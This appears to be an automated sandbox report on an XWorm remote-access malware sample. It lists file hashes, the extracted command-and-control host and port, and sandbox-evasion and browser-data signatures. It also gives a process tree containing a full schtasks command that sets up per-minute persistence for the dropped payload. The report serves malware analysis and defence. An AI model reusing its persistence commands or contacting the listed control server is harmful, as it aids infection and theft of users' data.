Analysis
max time kernel: 60s
max time network: 62s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240709-en locale:en-us os:windows10-2004-x64 system
submitted: 12-07-2024 22:25
Static task: static1
Behavioral task: behavioral1
Sample: d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
Resource: win7-20240705-en
General
Target: d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
Size: 761KB
MD5: 1b767b2a4f8596b12e1e2306cb3b9939
SHA1: 007190828b70f2a72311e603bbb94bcb2e41b1c0
SHA256: d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000
SHA512: cf3bbbfe500fc752eb0d777f44d90d1d245bb5394ada49a26a0ac31d62d331324a2c49f1e14072ec446d5a1acb44e9426868af2898cdfe65effe9092bf1fa6d7
SSDEEP: 12288:MSJBQ/xsjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrN:MABQ/mjuTt4TbQRjDH2eJQTNqcWOVZK1
Malware Config
Extracted
Family: xworm
C2: 127.0.0.1:13576
C2: edition-eat.gl.at.ply.gg:13576
Install_directory: %AppData%
install_file: USB.exe
Signatures
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral2/files/0x0009000000023466-6.dat | family_xworm
behavioral2/memory/1008-19-0x00000000008C0000-0x00000000008D8000-memory.dmp | family_xworm
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 4976 created 612 | 4976 | powershell.EXE | 5
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | x444.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk | x444.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk | x444.exe
Executes dropped EXE 8 IoCs
pid | Process
1008 | x444.exe
4244 | x4Shellcode.exe
1900 | alg.exe
1664 | elevation_service.exe
872 | elevation_service.exe
1320 | maintenanceservice.exe
1944 | OSE.EXE
3596 | x4svchost
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x4svchost = "C:\\Users\\Admin\\AppData\\Roaming\\x4svchost" | x444.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
16 | ip-api.com
Drops file in System32 directory 8 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\alg.exe | x4Shellcode.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\d07e7ad76c5b9070.bin | alg.exe
File opened for modification | C:\Windows\System32\Tasks\x4svchost | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 4976 set thread context of 3112 | 4976 | powershell.EXE | 96
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Enumerates system info in registry 2 TTPs 1 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Modifies data under HKEY_USERS 42 IoCs
Modifies registry class 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | sihost.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3740 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Windows\system32\winlogon.exe | cmdline: winlogon.exe | PID 612
    [2] C:\Windows\system32\dwm.exe | cmdline: "dwm.exe" | PID 64
    [2] C:\Windows\System32\dllhost.exe | cmdline: C:\Windows\System32\dllhost.exe /Processid:{46c2ea4a-e9ef-4341-a2b4-8ecf73bb93de} | PID 3112
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
[1] C:\Windows\system32\lsass.exe | cmdline: C:\Windows\system32\lsass.exe | PID 672
    - Suspicious use of WriteProcessMemory
[1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 948
[1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 388
[1] C:\Windows\System32\svchost.exe | cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 868
[1] C:\Windows\system32\svchost.exe | cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1108
    - Drops file in System32 directory
    [2] C:\Windows\system32\taskhostw.exe | cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID 3036
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<long obfuscated command line omitted>"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - PID 4976
    - \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (PID 3916)
  - C:\Users\Admin\AppData\Roaming\x4svchost (PID 3596)
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog (PID 1116)
  - Drops file in System32 directory
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService (PID 1148)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc (PID 1172)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc (PID 1188)
- C:\Windows\system32\svchost.exe -k LocalService -p -s nsi (PID 1292)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager (PID 1372)
  - sihost.exe (PID 2724)
    - Modifies registry class
- C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc (PID 1384)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp (PID 1392)
- C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc (PID 1604)
- C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes (PID 1668)
- C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem (PID 1676)
- C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm (PID 1716)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS (PID 1808)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder (PID 1832)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p (PID 1924)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt (PID 1984)
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache (PID 2024)
- C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository (PID 1744)
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p (PID 2072)
- C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection (PID 2112)
- C:\Windows\System32\spoolsv.exe (PID 2192)
- C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation (PID 2388)
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc (PID 2456)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT (PID 2584)
- C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent (PID 2592)
- C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc (PID 2744)
- C:\Windows\sysmon.exe (PID 2752)
- C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc (PID 2792)
  - Drops file in System32 directory
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks (PID 2800)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService (PID 2808)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer (PID 2820)
- C:\Windows\system32\wbem\unsecapp.exe -Embedding (PID 2232)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker (PID 3116)
- C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc (PID 3460)
- C:\Windows\Explorer.EXE (PID 3544)
  - "C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe" (PID 1704)
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - "C:\Users\Admin\AppData\Local\Temp\x444.exe" (PID 1008)
      - Checks computer location settings
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4svchost" /tr "C:\Users\Admin\AppData\Roaming\x4svchost" (PID 3740)
        - Scheduled Task/Job: Scheduled Task
    - "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe" (PID 4244)
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc (PID 3648)
- C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} (PID 3856)
- C:\Windows\System32\RuntimeBroker.exe -Embedding (PID 4008)
- C:\Windows\System32\RuntimeBroker.exe -Embedding (PID 3688)
- C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc (PID 3744)
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc (PID 4448)
- C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV (PID 4756)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc (PID 2120)
  - Modifies data under HKEY_USERS
- "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service (PID 2572)
- C:\Windows\system32\SppExtComObj.exe -Embedding (PID 4220)
- C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager (PID 4500)
- C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} (PID 1692)
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc (PID 4808)
- C:\Windows\System32\RuntimeBroker.exe -Embedding (PID 3564)
- C:\Windows\System32\RuntimeBroker.exe -Embedding (PID 4224)
- C:\Windows\System32\RuntimeBroker.exe -Embedding (PID 4424)
- C:\Windows\System32\alg.exe (PID 1900)
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
- "C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe" (PID 1664)
  - Executes dropped EXE
- "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe" (PID 872)
  - Executes dropped EXE
- "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" (PID 1320)
  - Executes dropped EXE
  - Drops file in Program Files directory
- "c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE" (PID 1944)
  - Executes dropped EXE
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding (PID 3164)
  - Checks BIOS information in registry
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Downloads